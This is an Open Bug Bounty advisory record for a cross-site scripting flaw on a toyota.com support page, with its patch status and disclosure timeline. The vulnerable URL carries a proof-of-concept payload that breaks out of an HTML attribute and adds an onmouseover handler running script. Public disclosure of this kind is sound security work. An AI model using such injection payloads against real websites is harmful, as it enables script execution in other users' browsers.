toyota.com XSS vulnerability

2016-02-19T12:08:00
ID OBB:136325
Type openbugbounty
Reporter tbm
Modified 2017-02-24T15:35:00

Description

Vulnerable URL:
http://www.toyota.com/entune/support/epas%22%20onmouseover%3dalert%28%27XSSPOSED%27%29%20bad%3d%22/voice-recognition/advanced-voice-recognition-faqs/does-the-voice-recognition-system-on-entune-audio-systems-recognize-different-languages/

Details:

Description| Value
---|---
Patched:| Yes, on 24.02.2017
Latest check for patch:| 24.02.2017 03:13 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 4385
Google Pagerank:| 7
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 19 February, 2016 12:08 GMT
Generic security notifications sent to website owner| 19 February, 2016 12:11 GMT
Notification sent to subscribers (without technical details)| 19 February, 2016 14:17 GMT
Vulnerability details disclosed by researcher| 5 August, 2016 12:12 GMT
Vulnerability patched by the website owner| 24 February, 2017 15:35 GMT